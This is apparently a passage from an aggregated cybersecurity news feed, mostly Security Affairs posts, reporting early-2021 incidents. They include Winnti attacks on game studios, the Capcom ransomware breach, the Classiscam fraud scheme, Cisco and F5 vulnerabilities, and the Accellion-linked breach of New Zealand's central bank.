Siemens also addressed six vulnerabilities in its Solid Edge solution that provides software tools for 3D design, simulation and manufacturing. The flaws could lead arbitrary code execution and information disclosure.

“Solid Edge is affected by multiple vulnerabilities that could allow arbitrary code execution on an affected system. Siemens has released an update for Solid Edge and recommends to update to the latest version.” reads the advisory.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Siemens)

The post Siemens fixed tens of flaws in Siemens Digital Industries Software products appeared first on Security Affairs.

Joker’s Stash, the largest carding site, is shutting down

Joker’s Stash to shut down on February 15, 2021.

Joker’s Stash, the largest carding marketplace online announced that it was shutting down its operations on February 15, 2021.

Joker’s Stash, the largest carding marketplace online, announced that its operations will shut down on February 15, 2021.

The administrator announced the decision via messages posted on various cybercrime forums.

Joker’s Stash Official Closing Message
Image source FlashPoint

Joker’s Stash is one of the most longevous carding websites, it was launched in October 2014 and is very popular in the cybercrime underground due to the freshness of its cards and their validity. The administrators always claimed the exclusivity of their offer that is based on “self-hacked bases.”

In December, Joker’s Stash was shut down as a result of a coordinated operation conducted by the FBI and Interpol.

Joker's Stash

At the time, the authorities only seized some of the servers used by the carding portal, but the Joker’s Stash site hosted on the ToR network was not affected by the operations conducted by the police.

The sized sites were at jstash.bazar, jstash.lib, jstash.emc, and jstash.coin, which are all those accessible via blockchain DNS.

Joker Stash admins said in a message published on a hacking forum that the law enforcement only seized the servers hosting the above domains, that were only used to redirecting visitors to the actual website.

The seizure operated by law enforcement in December had an impact on the reputation of the portal, some users were also claiming that the quality of the services offered by Joker’s Stash was decreasing.

“Throughout 2020, the typically active administrator JokerStash had several gaps in communications. JokerStash claimed that they were hospitalized due to a coronavirus infection. The decreasing number of large fresh bases also questioned their ability to source new card data.” reported FlashPoint.

The news of the closure of the card shop represents a major hit to the carding activities in the underground market.

The success of the recent operations might have pushed the administrators into an exit from their operations.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, carding)

The post Joker’s Stash, the largest carding site, is shutting down appeared first on Security Affairs.

Expert launched Malvuln, a project to report flaws in malware

The researcher John Page launched, the first website exclusively dedicated to the research of security flaws in malware codes.

The security expert John Page (aka hyp3rlinx) launched, the first platform exclusively dedicated to the research of security flaws in malware codes.

The news was first announced by SecurityWeek, the researcher explained that Malvuln is the first website dedicated to research and analysis of vulnerabilities in malware samples.

“ is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself.” wrote the expert. “There are many websites already offering information about Malware like Hashes, IOC, Reversing etc. However, none dedicated to research and analysis of vulnerabilities within Malware samples… until now. Long Live MALVULN.”

Sharing the knowledge of vulnerabilities affecting malware could allow incident response teams to neutralize the threat in case of infections, but could also help vxers to address them end improve their malware. For this reason, it is likely that Page will regulate the vulnerability disclosure process in the future.

This is a great initiative, we have to support it, everyone can get in contact with the expert via Twitter (@malvuln) or Email (malvuln13[at]

Currently, Page is the unique contributor of the Malvuln service, but he could start accepting third-party contributions in the future.

Clearly, the initiative is born for educational and research purposes only.

At the time of writing the site already includes 26 entries related to remotely exploitable buffer overflow flaws and privilege escalation issues. Most of the buffer overflow vulnerabilities could be exploited for remote code execution.

For each flaw reported through the website, the record includes multiple information such as the name of the malware, the MD5 hash, the type of vulnerability, a description of the vulnerability, dropped files, a memory dump, and proof-of-concept (PoC) exploit code.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

The post Expert launched Malvuln, a project to report flaws in malware appeared first on Security Affairs.

Winnti APT continues to target game developers in Russia and abroad

A Chinese Threat actor targeted organizations in Russia and Hong Kong with a previously undocumented backdoor, experts warn.

Cybersecurity researchers from Positive Technologies have uncovered a series of attacks conducted by a Chinese threat actor that aimed at organizations in Russia and Hong Kong. Experts attribute the attacks to the China-linked Winnti APT group (aka APT41) and reported that the attackers used a previously undocumented backdoor in the attacks.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, Group 72, Blackfly, and APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

The recent attacks documented by Positive Technologies were first spotted on May 12, 2020, at the time the experts detected several samples of the new malware that were initially incorrectly attributed to the Higaisa threat actors. Investigating the attack, the experts discover a number of new malware samples used by the attackers, including various droppers, loaders, and injectors. The attackers also used Crosswalk, ShadowPad, and PlugX backdoors, but security researchers also noticed a sample of a previously undocumented backdoor that they dubbed FunnySwitch.

In the first attack, the threat actors used LNK shortcuts to extract and run the malware payload, while in the second attack detected on May 30, the threat actor used a malicious archive (CV_Colliers.rar) containing the shortcuts to two bait PDF documents with a CV and IELTS certificate.

The LNK files contain links to target pages hosted on Zeplin, a legitimate collaboration services between designers and developers.

The payload consists of two files, the svchast.exe that acts as a simple local shellcode loader, and ‘3t54dE3r.tmp’ that is the shellcode containing the main payload (the Crosswalk malware).

The Crosswalk was first spotted by researchers from FireEye in 2017 Crosswalk and included in an analysis of the activities associated with the APT41 (Winnti) group. The malware is a modular backdoor that implements system reconnaissance capabilities and is able to deliver additional payloads.

Experts also discovered a significant overlap of the network infrastructure with the APT41’s infrastructure.

“The network infrastructure of the samples overlaps with previously known APT41 infrastructure: at the IP address of one of the C2 servers, we find an SSL certificate with SHA-1 value of b8cff709950cfa86665363d9553532db9922265c, which is also found at IP address 67.229.97[.]229, referenced in a 2018 CrowdStrike report. Going further, we can find domains from a Kaspersky report written in 2013.” reads the report published by Positive Technologies. “All this leads us to conclude that these LNK file attacks were performed by Winnti (APT41), which “borrowed” this shortcut technique from Higaisa.”

Winnti infrastructure

The Winnti group focus on computer game industry, in the past they targeted game developers and recently they hit Russian companies in the same industry. The targets of the recent attacks include Battlestate Games, a Unity3D game developer from St. Petersburg.

On June, the researchers detected an active HttpFileServer on one of the active C2 servers. The HFS was containing an email icon, screenshot from a game with Russian text, screenshot of the site of a game development company, and a screenshot of information about vulnerability CVE-2020-0796 from the Microsoft website. The files were used two months later, on August 20, 2020, in attacks that also leveraged a self-contained loader for Cobalt Strike Beacon PL shellcode.

The discovery lead the experts into believing that they detected traces of preparation for, and subsequent successful implementation of, an attack on Battlestate Games.

“Winnti continues to pursue game developers and publishers in Russia and elsewhere. Small studios tend to neglect information security, making them a tempting target. Attacks on software developers are especially dangerous for the risk they pose to end users, as already happened in the well-known cases of CCleaner and ASUS. By ensuring timely detection and investigation of breaches, companies can avoid becoming victims of such a scenario.” concludes the report.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Winnti APT)

The post Winnti APT continues to target game developers in Russia and abroad appeared first on Security Affairs.

Expert discovered a DoS vulnerability in F5 BIG-IP systems

A security researcher discovered a flaw in the F5 BIG-IP product that can be exploited to conduct denial-of-service (DoS) attacks.

The security expert Nikita Abramov from Positive Technologies discovered a DoS vulnerability, tracked as CVE-2020-27716, that affects certain versions of F5 BIG-IP Access Policy Manager (APM).

The F5 BIG-IP Access Policy Manager is a secure, flexible, high-performance access management proxy solution that delivers unified global access control for your users, devices, applications, and application programming interfaces (APIs).

The vulnerability resides in the Traffic Management Microkernel (TMM) component which processes all load-balanced traffic on BIG-IP devices.

“When a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts. (CVE-2020-27716)” reads the advisory published by F5. “Traffic processing is disrupted while TMM restarts. If the affected BIG-IP system is configured as part of a device group, the system triggers a failover to the peer device.”

An attacker could trigger the flaw by simply sending a specially crafted HTTP request to the server hosting the BIG-IP configuration utility, and that would be enough to block access to the controller for a while (until it automatically restarts).

Vulnerabilities like this one are quite commonly found in code. They can occur for different reasons, for example unconsciously neglected bydevelopers or due to insufficient additional checks being carried out. I discovered this vulnerability during binary analysis. Flaws like this one can be detected using non-standard requests and by analyzing logic and logical inconsistencies.” Nikita Abramov researcher at Positive Technologies explains.

The flaw impacts versions 14.x and 15.x, the vendor already released security updates that address it.

In June, researchers at F5 Networks addressed another flaw, tracked as CVE-2020-5902, which resides in undisclosed pages of Traffic Management User Interface (TMUI) of the BIG-IP product.

The vulnerability could be exploited by attackers to gain access to the TMUI component to execute arbitrary system commands, disable services, execute arbitrary Java code, and create or delete files, and potentially take over the BIG-IP device

The CVE-2020-5902 vulnerability received a CVSS score of 10, this means that is quite easy to exploit. The issue could be exploited by sending a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

Immediately after the public disclosure of the flaw, that several proof-of-concept (PoC) exploits have been released, some of them are very easy to use.

A few days after the disclosure of the vulnerability in the F5 Networks BIG-IP product threat actors started exploiting it in attacks in the wild. Threat actors exploited the CVE-2020-5902 flaw to obtain passwords, create web shells, and infect systems with various malware.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, F5 BIG-IP)

The post Expert discovered a DoS vulnerability in F5 BIG-IP systems appeared first on Security Affairs.

Operation Spalax, an ongoing malware campaign targeting Colombian entities

Security experts from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian government institutions and private companies.

Malware researchers from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian entities exclusively.

The attacks aimed at government institutions and private companies, most of them in the energy and metallurgical sectors.  The campaign has been active at least since 2020, the attackers leverage remote access trojans to spy on their victims. 

The attacks share some similarities with other campaigns targeting Colombian entities, in particular a campaign detailed in February 2019, by QiAnXin. The operations described by QiAnXin are attributed to an APT group active since at least April 2018.

Below the similarities found by ESET:

  • We saw a malicious sample included in IoCs of QiAnXin’s report and a sample from the new campaign in the same government organization. These files have fewer than a dozen sightings each.
  • Some of the phishing emails from the current campaign were sent from IP addresses corresponding to a range that belongs to Powerhouse Management, a VPN service. The same IP address range was used for emails sent in the earlier campaign.
  • The phishing emails have similar topics and pretend to come from some of the same entities – for example, the Office of the Attorney General (Fiscalia General de la Nacion) or the National Directorate of Taxes and Customs (DIAN).
  • Some of the C&C servers in Operation Spalax use and subdomains, along with IP addresses that belong to Powerhouse Management. This also happened in the earlier campaign.

However, experts found differences in the attachments used for phishing emails, the remote access trojans (RATs) used the operator’s C&C infrastructure.

The attacks start with phishing messages that lead to the download of RAR archives hosted on OneDrive or MediaFire containing a malicious executable.

“We’ve found a variety of packers used for these executables, but their purpose is always to have a remote access trojan running on the victimized computer, usually by decrypting the payload and injecting it into legitimate processes.” continues the report. “We have seen the attackers use three different RATs: Remcos, njRAT and AsyncRAT.”

Operation Spalax

The phishing messages used a wide range of topics as lures, such as notifications of driving infractions, to attend court hearings, and to take mandatory COVID-19 tests.

ESET also documented the use of heavily obfuscated AutoIt droppers, in this attack scenario the first-stage malware performs the injection and execution of the payload. The malware use two shellcodes contained in the compiled AutoIt script, the first one decrypts the payload and the second injects it into some process.

The Trojans used in Operation Spalax implements several capabilities to spy on targets, such as keylogging, screen capture, clipboard hijacking, exfiltration of files, and the ability to download and execute other payloads.

ESET pointed out that the attackers leveraged on large network C2 infrastructure, experts observed at least 24 different IP addresses in use in the second half of 2020. Attackers probably compromised devices to use them as proxies for their C2 servers. The threat actors also used dynamic DNS services to manage a pool of 70 different domain names (and also register new ones on a regular basis) that are dynamically assigned to IP addresses. In the second half of 2020 alone they used 24 IP addresses.

“Targeted malware attacks against Colombian entities have been scaled up since the campaigns that were described last year,” ESET concludes. “The landscape has changed from a campaign that had a handful of C2 servers and domain names to a campaign with very large and fast-changing infrastructure with hundreds of domain names used since 2019.”

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Spalax)

The post Operation Spalax, an ongoing malware campaign targeting Colombian entities appeared first on Security Affairs.

CAPCOM: 390,000 people impacted in the recent ransomware Attack

Capcom revealed that the recent ransomware attack has potentially impacted 390,000 people, an increase of approximately 40,000 people from the previous report.

In November, Japanese game developer Capcom admitted to have suffered a cyberattack that is impacting business operations.

The company has developed multiple multi-million-selling game franchises, including Street Fighter, Mega Man, Darkstalkers, Resident Evil, Devil May Cry, Onimusha, Dino Crisis, Dead Rising, Sengoku Basara, Ghosts ‘n Goblins, Monster Hunter, Breath of Fire, and Ace Attorney as well as games based on Disney animated properties.

At the time, the Notice Regarding Network Issues published by the company revealed that on the morning of November 2nd, 2020 is suffered a cyberattack, In response to the incident the game developer shut down portions of their corporate network to prevent the malware from spreading.

The incident has not impacted connections for its players, the company initially declared that had not found any evidence that customer data was stolen.

In Mid-November, the company confirmed that the attackers accessed the personal information of its employees, along with financial and business information. The company believes that other information potentially accessed includes sales reports, financial information, game development documents, other information related to business partners.

No credit card information was compromised in the security breach.

After the attack, the Ragnar Locker ransomware operators claimed to have stolen over 1TB of data from the company.

In an update published by the Ragnar ransomware gang on it leak site the operators leaked a collection of archives as proof of the hack.Greetings !

“Unfortunately even such worldwide leading company as CAPCOM doesn’t values much privacy and security. They was notified about vulnerability and data leak numerous time.” reads the post published by Ragnar gang on its leak site. They checked our page with proofs but even this didn’t help them to make a right decision and save data from leakage. Also we would help them to decrypt and also provide with recommendations on security measures improvement, to avoid such issues in future.” reads the post published by the ransomware on its leak site.

“We are sure that everyone should know about CAPCOM’s decision and careless attitude regarding data privacy. This might seems crazy in 21st century, all corporates should work harder on their security measures, especially IT and online based companies.”


This week, Capcom provided an update on its investigation, that revealed the incident was worse than initially thought because the number of impacted people is larger than initially believed.

Capcom revealed that the personal information of 16,415 people was stolen by the ransomware gang. Impacted people includes 3,248 business partners, 9,164 former employees, and related parties, and 3,994 employees and related parties. Only 9 people were impacted.

“Further, because the overall number of potentially compromised data cannot specifically be ascertained due to issues including some logs having been lost as a result of the attack, Capcom has listed the maximum number of items it has determined to potentially have been affected at the present time.” reads the update published by the company.

Cumulative maximum number of potentially impacted people is 390,000, an increase of approximately 40,000 people from the previous report.

1. Information verified to have been compromised (updated)

i. Personal Information16,406 people *cumulative total since investigation began: 16,415 peopleBusiness partners, etc.: 3,248 people
At least one of the following: name, address, phone number, email address, etc.Former employees and related parties: 9,164 people
At least one of the following: name, email address, HR information, etc.Employees and related parties: 3,994 people
At least one of the following: name, email address, HR information, etc.
ii. Other InformationSales reports, financial information, game development documents, other information related to business partners

2. Potentially compromised data (updated)

i. Personal InformationApplicants: approx. 58,000 people
At least one of the following: name, address, phone number, email address, etc.*Cumulative maximum number of potentially compromised data for customers,
business partners and other external parties: 390,000 people*Regarding the cumulative maximum number of potentially compromised data above: as part of its ongoing investigation, Capcom has determined that it currently does not see evidence for the possibility of data compromise for the approximate 18,000 items of personal information from North America (Capcom Store member information and esports operations website members) that the company included in its November 16, 2020 announcement. As such, these have been removed from this cumulative maximum number of potentially compromised data.

The company pointed out that the investigation is still ongoing and that new fact may come to light.

“At this point in time, Capcom’s internal systems have in large part recovered, and business operations have returned to normal.” concludes the update.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, CAPCOM)

The post CAPCOM: 390,000 people impacted in the recent ransomware Attack appeared first on Security Affairs.

Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds

Russian-speaking scammers started targeting users of European marketplaces and classifieds is a criminal scheme dubbed Classiscam.

Group-IB, a global threat hunting and and adversary-centric cyber intelligence company, has discovered that Russian-speaking scammers started targeting users of European marketplaces and classifieds. The scheme, dubbed Classiscam by Group-IB, is an automated scam as a service designed to steal money and payment data. The scheme uses Telegram bots that provide scammers with ready-to-use pages mimicking popular classifieds, marketplaces and sometimes delivery services. According to Group-IB, over 20 large groups, leveraging the scheme, currently operate in Bulgaria, the Czech Republic, France, Poland, Romania, the US, and post-Soviet countries, while 20 more groups work in Russia. These 40 groups altogether made at least USD 6.5 mln in 2020. Scammers are actively abusing brands of popular international classifieds and marketplaces, such as Leboncoin, Allegro, OLX, FAN Courier, Sbazar, and etc. Group-IB has sent notifications to the affected brands so they could take the necessary steps to protect against Classiscam. 


The scheme, which initially exploited delivery brands, has been tried and tested in Russia. Analysts warn that it is now growing rapidly and reaching users of European classifieds and marketplaces, which were chosen as a target by Russian-speaking scammers to increase their profits and reduce the risk of being caught. Fighting the scam requires joint efforts by classifieds, marketplaces, and delivery services. It is also key to use advanced digital risk protection technology to ensure that any brand impersonating attacks are quickly detected and taken down. 

Exporting Classiscam

Group-IB Computer Emergency Response Team (CERT-GIB) for the first time recorded the Classiscam in Russia in the summer of 2019. Peak activity was recorded in the spring of 2020 due to the massive switch to remote working and an increase in online shopping.

“In the summer of 2020 we took down 280 scam pages as part of the Classiscam scheme, and by December that number grew 10-fold and reached up to 3,000 pages,” says Yaroslav Kargalev, the deputy head of CERT-GIB. “We see that Classiscammers are now actively migrating from Russia to Europe and other countries. It’s not the first time when Russia serves as a testing ground for cybercriminals with global ambitions.” 

Group-IB’s Digital Risk Protection and CERT-GIB experts have so far identified at least 40 active Classiscam gangs that use scam pages mimicking popular classified, marketplace, and delivery companies with every one of them running a separate Telegram bot. Half of the groups already operate outside of Russia. Despite that scammers are making their first attempts in Europe, an average theft costs users about USD 120. The scam was localized for the markets of Eastern and Western Europe. The brands abused by scammers include the French marketplace Leboncoin, Polish brand Allegro, Czech site Sbazar, Romanian FAN Courier, DHL and many others. An analysis of underground forums and chats revealed that scammers are getting ready to use new brands in their scams, these are FedEx and DHL Express in the US and Bulgaria.

As part of the scheme, scammers publish bait ads on popular marketplaces and classified websites. The ads usually offer cameras, game consoles, laptops, smartphones, and similar items for sale at deliberately low prices. The buyer contacts the seller, who lures the former into continuing the talk through a third party messenger, such as  WhatsApp. It’s noteworthy that scammers pose as both buyers and sellers. To be more persuasive, the scammers use local phone numbers when speaking with their victims. Such services are offered in the underground. 


Although many marketplaces and classifieds that sell new and used goods have an active policy of protecting users from fraudsters by posting warnings on their resources, victims continue to give away their data. 

Evildoers ask victims to provide their contact information to allegedly arrange a delivery. The scammer then sends the buyer an URL to either a fake popular courier service website or a scam website mimicking a classified or a marketplace with a payment form, which turns out to be a scam page. As a result, the fraudster obtains payment data or withdraws money through a fake merchant website. Another scenario invlolves a scammer contacting a legitimate seller under the guise of a customer and sending a fake payment form mimicking a marketplace and obtained via Telegram bot, so that the seller could reportedly receive the money from the scammer. 


Classiscam Hierarchy 

Group-IB discovered at least 40 groups leveraging Classiscam, with each of them running a separate Telegram chat-bot. At least 20 of these groups focus on European countries. On average, they make around US $61,000 monthly, but profits may differ from group to group. It is estimated that all 40 most active criminal groups make US $522,000 per month in total. 

The hierarchy of the scammer groups represents a pyramid, with the topic starters on top. They are responsible for recruiting new members, creating scam pages, registering new accounts, and providing assistance when the bank blocks the recipient’s card or the transaction. The topic starters’ share is about 20-30 percent of the stolen sum. “Workers” get 70-80 percent of the stolen sum for communicating with victims and sending them phishing URLs. 


All details of deals made by workers (including the sum, payment number and username) are displayed in a Telegram bot. That’s how Group-IB experts were able to calсulate their estimated monthly haul. 

Based on payment statistics, the most successful workers move to the top of the list and become influential members of the project. By doing so, they gain access to VIP options in the chats and can work on European marketplaces, which offer a higher income and involve less risks for Russian-speaking scammers. Workers’ assistants are called “callers” and “refunders.” They pretend to be tech support specialists and receive 5-10 percent of the revenue.

Phishing kit in Telegram

The scheme is simple and straightforward, which makes it all the more popular. There are more reasons behind its growing popularity, however, such as automated management and expansion through special Telegram chat bots. More than 5,000 users (scammers) were registered in 40 most popular Telegram chats by the end of 2020.  

As it stands, workers just need to send a link with the bait product to the chatbot, which then generates a complete phishing kit including courier URL, payment, and refund. There are more than 10 types of Telegram bots that create scam pages for brands from Bulgaria, the Czech Republic, France, Poland, and Romania. For each brand and country, scammers write scripts that help newbie workers log in to foreign sites and communicate with victims in the local language.

Chatbots also have shops where you can purchase accounts to various marketplaces, e-wallets, targeted mailings, and manuals, or even hire a lawyer to represent you in court.  

“So far, the scam’s expansion in Europe is hindered by language barriers and difficulties with cashing our stolen money abroad,” says Dmitriy Tiunkin, Head of Group-IB Digital Risk Protection Department, Europe. “Once the scammers overcome these barriers, Classiscam will spread in the West. The downside of popularity is competition among scammers, who sometimes frame each other without knowing it.” 

Fighting the Classiscam

In order to protect their brands from Classiscam, companies need to go beyond the simple monitoring and blocking approach. Instead, it is necessary to identify and block adversary infrastructure using AI-driven digital risk protection systems enriched with data about adversary infrastructure, techniques, tactics, and new fraud schemes. 


The recommendations for users are quite simple and include: 

·     Trust only official websites. Before entering your login details and payment information, double check the URL and Google it to see when it was created. If the site is only a couple of months old, it is highly likely to be a scam or a phishing page.

·      When using services for renting or selling new and used goods, do not switch to messengers. Keep all your communication in the official chat.

·      Do not order goods or agree to deals involving a prepaid transaction. Pay only after you receive the goods and make sure that everything is working properly.

·      Large discounts and unbelievable promotions may be just that: too good to be true. They are likely to indicate a bait product and a phishing page. Be careful.

About the author: Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks and online fraud. The company also specializes in high-profile cyber investigations and IP protection services. 

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Classiscam)

The post Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds appeared first on Security Affairs.

Cisco addresses a High-severity flaw in CMX Software

Cisco addressed tens of high-severity flaws, including some flaws in the AnyConnect Secure Mobility Client and in its small business routers.

This week Cisco released security updates to address 67 high-severity vulnerabilities, including issues affecting Cisco’s AnyConnect Secure Mobility Client and small business routers (i.e. Cisco RV110W, RV130, RV130W, and RV215W). One of the flaws fixed by the tech giant, tracked as CVE-2021-1144, is a high-severity vulnerability that affects Cisco Connected Mobile Experiences (CMX), which is a smart Wi-Fi solution that uses the Cisco wireless infrastructure to provide location services and location analytics for consumers’ mobile devices. CMX supports your organization’s Wi-Fi and mobile engagement and allows them to directly deliver content to smartphones and tablets that are personalized to visitors’ preferences and pertinent to their real-time indoor locations.

The vulnerability, which received a CVSS score of 8.8 out of 10, could be exploited by a remote authenticated attacker to change the password for any account user on affected systems.

“A vulnerability in Cisco Connected Mobile Experiences (CMX) could allow a remote, authenticated attacker without administrative privileges to alter the password of any user on an affected system.” reads the advisory published by Cisco.

“The vulnerability is due to incorrect handling of authorization checks for changing a password. An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device. A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.”

The flaw affects Cisco CMX releases 10.6.0, 10.6.1, and 10.6.2.

The vendor addressed the flaw with the release of 10.6.3 software version, it also informed customers that are no workarounds that address this issue.

Cisco also addressed a DLL Injection flaw, tracked as CVE-2021-1237, in Cisco AnyConnect Secure Mobility Client for Windows.

The flaw received a CVSS score of 7.8, attackers could exploit it to conduct a dynamic-link library (DLL) injection attack.

“A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.” reads the advisory.

“The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.”

Cisco also fixed a series of flaws in Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface that could lead remote command execution and denial of service attacks.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, CMX)

The post Cisco addresses a High-severity flaw in CMX Software appeared first on Security Affairs.

CISA warns of recent successful cyberattacks against cloud service accounts

The US CISA revealed that several recent successful cyberattacks against various organizations’ cloud services. 

The Cybersecurity and Infrastructure Security Agency (CISA) announced that several recent successful cyberattacks hit various organizations’ cloud services.

According to the agency, the attackers conducted phishing campaigns and exploited poor cyber hygiene practices of the victims in the management of cloud services configuration.

CISA has published a report that includes information collected exclusively from several CISA incident response engagements, these data are extremely precious because detail the tactics, techniques, and procedures used by threat actors and indicators of compromise (IOCs). Data in the Analysis Report is not explicitly tied to the supply chain attack on SolarWinds Orion Platform software.

“The cyber threat actors involved in these attacks used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a “pass-the-cookie” attack—to attempt to exploit weaknesses in the victim organizations’ cloud security practices.” reads the report published by CISA.

The US revealed that threat actors bypassed multi-factor authentication (MFA) authentication protocols to compromise cloud service accounts.

Attackers may have used browser cookies to defeat MFA with a “pass-the-cookie” attack ([T1550.004]).

Government experts confirmed that the threat actors initially attempted brute force logins on some accounts without success.

At least in one case, the attackers modified or set up email forwarding rules to redirect the emails to an account under their control.

Threat actors also modified existing rules to search users’ email messages (subject and body) for keywords that could allow them to identify messages containing sensitive data (i.e. Financial information) and forward them to their accounts.

“In addition to modifying existing user email rules, the threat actors created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ Really Simple Syndication (RSS) Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users,” continues CISA.

The FBI also warned US organizations about scammers abusing auto-forwarding rules on web-based email clients in Business Email Compromise (BEC) attacks.

Last week, Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack also employed common hacker techniques to compromise the networks of the targeted organizations, including password guessing and password spraying.

CISA also added that inappropriately secured administrative credentials accessible via external remote access services were abused by the attackers.

CISA added that it is investigating incidents in which threat actors abused the Security Assertion Markup Language (SAML) tokens.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

The post CISA warns of recent successful cyberattacks against cloud service accounts appeared first on Security Affairs.

Attackers targeted Accellion FTA in New Zealand Central Bank attack

The root cause for the hack of the New Zealand Central Bank was the Accellion FTA (File Transfer Application) file sharing service.

During the weekend, the New Zealand central bank announced that a cyber attack hit its infrastructure. According to the Government organization, one of its data systems has been breached by an unidentified hacker, commercially and personally sensitive information might have been accessed by the attackers.

According to Governor Adrian Orr the attack did not impact the bank’s core operations, anyway, it added that the security breach has been contained. In response to the incident, the affected system had been taken offline.

“We are actively working with domestic and international cyber security experts and other relevant authorities as part of our investigation. This includes the GCSB’s National Cyber Security Centre which has been notified and is providing guidance and advice,” the bank’s governor, Adrian Orr, said.

“We have been advised by the third party provider that this wasn’t a specific attack on the Reserve Bank, and other users of the file sharing application were also compromised.” “We recognise the public interest in this incident however we are not in a position to provide further details at this time.”

National authorities immediately launched an investigation into the incident with the help of cybersecurity experts.

According to the bank, threat actors compromised a service that stored commercially and personally sensitive information.

Early this week, the Reserve Bank of New Zealand confirmed that it uses Accellion FTA service to share information with external stakeholders.

“The Reserve Bank of New Zealand – Te Pūtea Matua continues to respond with urgency to a breach of a third party file sharing service used to share information with external stakeholders.” reads the press release published by the Reserve Bank.

The bank confirmed that a third party file sharing service provided by Accellion called FTA (File Transfer Application), which it was using, was illegally accessed in mid-December.

The bank is not providing additional information on the intrusion to avoid affecting the investigation.

According to Ancellion, less than 50 customers were affected by the flaw.

“In mid-December, Accellion was made aware of a P0 vulnerability in its legacy File Transfer Appliance (FTA) software. Accellion FTA is a 20 year old product that specializes in large file transfers.” reads the advisory published by the company. “Accellion resolved the vulnerability and released a patch within 72 hours to the less than 50 customers affected.”

Accellion pointed out that its enterprise content firewall platform, kiteworks, was not involved in any way.

“While Accellion maintains tight security standards for its legacy FTA product, we strongly encourage our customers to update to kiteworks, the modern enterprise content firewall platform,for the highest level of security and confidence,” concludes the US-based vendor.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, New Zealand)

The post Attackers targeted Accellion FTA in New Zealand Central Bank attack appeared first on Security Affairs.

Global cyber-espionage campaign linked to Russian spying tools

Kaspersky investigators uncover evidence that may support US claims Moscow was behind attack

A Moscow-based cybersecurity company has reported that some of the malicious code employed against the US government in a cyber-attack last month overlaps with code previously used by suspected Russian hackers.

The findings by Kaspersky investigators may provide the first public evidence to support accusations from Washington that Moscow was behind the biggest cyber-raid against the government in years, affecting 18,000 users of software produced by SolarWinds, including US government agencies.

Related: What you need to know about the biggest hack of the US government in years

Continue reading...

APT Horoscope

This delightful essay matches APT hacker groups up with astrological signs. This is me:

Capricorn is renowned for its discipline, skilled navigation, and steadfastness. Just like Capricorn, Helix Kitten (also known as APT 35 or OilRig) is a skilled navigator of vast online networks, maneuvering deftly across an array of organizations, including those in aerospace, energy, finance, government, hospitality, and telecommunications. Steadfast in its work and objectives, Helix Kitten has a consistent track record of developing meticulous spear-phishing attacks.

Russia’s SolarWinds Attack and Software Security

The information that is emerging about Russia’s extensive cyberintelligence operation against the United States and other countries should be increasingly alarming to the public. The magnitude of the hacking, now believed to have affected more than 250 federal agencies and businesses — ­primarily through a malicious update of the SolarWinds network management software — ­may have slipped under most people’s radar during the holiday season, but its implications are stunning.

According to a Washington Post report, this is a massive intelligence coup by Russia’s foreign intelligence service (SVR). And a massive security failure on the part of the United States is also to blame. Our insecure Internet infrastructure has become a critical national security risk­ — one that we need to take seriously and spend money to reduce.

President-elect Joe Biden’s initial response spoke of retaliation, but there really isn’t much the United States can do beyond what it already does. Cyberespionage is business as usual among countries and governments, and the United States is aggressively offensive in this regard. We benefit from the lack of norms in this area and are unlikely to push back too hard because we don’t want to limit our own offensive actions.

